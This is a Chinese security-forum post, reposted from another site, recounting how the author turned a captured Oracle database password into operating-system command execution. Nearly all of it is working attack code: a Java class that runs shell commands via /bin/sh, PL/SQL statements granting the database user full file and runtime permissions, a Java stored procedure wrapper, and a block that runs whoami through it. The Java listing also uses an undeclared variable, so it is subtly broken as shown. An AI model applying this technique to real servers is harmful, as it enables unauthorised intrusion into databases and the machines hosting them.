搜索
查看: 1107|回复: 0

Oracle 执行 Linux 命令

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2017-9-28 23:17:00 | 显示全部楼层 |阅读模式
原文地址https://secvul.com/topics/793.html


某日获取到目标1521密码,接下来就直接RCE,记录下过程。
1、navicat 连上后,建立一个 java.
  1. import java.io.*;
  2. public class Host {
  3. public static void executeCommand(String command) {
  4. try {
  5. finalCommand = new String[3];
  6. finalCommand[0] = "/bin/sh";
  7. finalCommand[1] = "-c";
  8. finalCommand[2] = command;
  9. Process pr = Runtime.getRuntime().exec(finalCommand);
  10. pr.waitFor();
  11. new Thread(new Runnable(){
  12. public void run() {
  13. BufferedReader br_in = null;
  14. try {
  15. br_in = new BufferedReader(new InputStreamReader(pr.getInputStream()));
  16. String buff = null;
  17. while ((buff = br_in.readLine()) != null) {
  18. System.out.println("Process out :" + buff);
  19. try {Thread.sleep(100); } catch(Exception e) {}
  20. }
  21. br_in.close();
  22. }
  23. catch (IOException ioe) {
  24. System.out.println("Exception caught printing process output.");
  25. ioe.printStackTrace();
  26. }
  27. finally {
  28. try {
  29. br_in.close();
  30. } catch (Exception ex) {}
  31. }
  32. }
  33. }).start();

  34. new Thread(new Runnable(){
  35. public void run() {
  36. BufferedReader br_err = null;
  37. try {
  38. br_err = new BufferedReader(new InputStreamReader(pr.getErrorStream()));
  39. String buff = null;
  40. while ((buff = br_err.readLine()) != null) {
  41. System.out.println("Process err :" + buff);
  42. try {Thread.sleep(100); } catch(Exception e) {}
  43. }
  44. br_err.close();
  45. }
  46. catch (IOException ioe) {
  47. System.out.println("Exception caught printing process error.");
  48. ioe.printStackTrace();
  49. }
  50. finally {
  51. try {
  52. br_err.close();
  53. } catch (Exception ex) {}
  54. }
  55. }
  56. }).start();
  57. }
  58. catch (Exception ex) {
  59. System.out.println(ex.getLocalizedMessage());
  60. }
  61. }

  62. public static boolean isWindows() {
  63. if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
  64. return true;
  65. else
  66. return false;
  67. }
  68. };
复制代码
2、新建查询,给数据库用户授权

  1. declare
  2. begin
  3. DBMS_JAVA.grant_permission('数据库用户','java.io.FilePermission', '<<ALL FILES>>', 'read ,write, execute,delete');
  4. Dbms_Java.Grant_Permission('数据库用户','SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
  5. Dbms_Java.Grant_Permission('数据库用户','SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
  6. end;
复制代码
3、建立映射过程

  1. CREATE OR REPLACE PROCEDURE host_command (p_command IN VARCHAR2)

  2. AS LANGUAGE JAVA

  3. NAME'类名.executeCommand (java.lang.String)';
复制代码
4、执行命令

  1. DECLARE

  2. l_output DBMS_OUTPUT.chararr;

  3. l_lines INTEGER := 1000;

  4. BEGIN

  5. DBMS_OUTPUT.enable(1000000);

  6. DBMS_JAVA.set_output(1000000);

  7. host_command('/usr/bin/whoami'); --执行显示目录的命令

  8. DBMS_OUTPUT.get_lines(l_output, l_lines);

  9. FOR i IN 1 .. l_lines LOOP

  10. DBMS_OUTPUT.put_line(l_output(i));

  11. NULL;

  12. END LOOP;

  13. END;
复制代码

过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表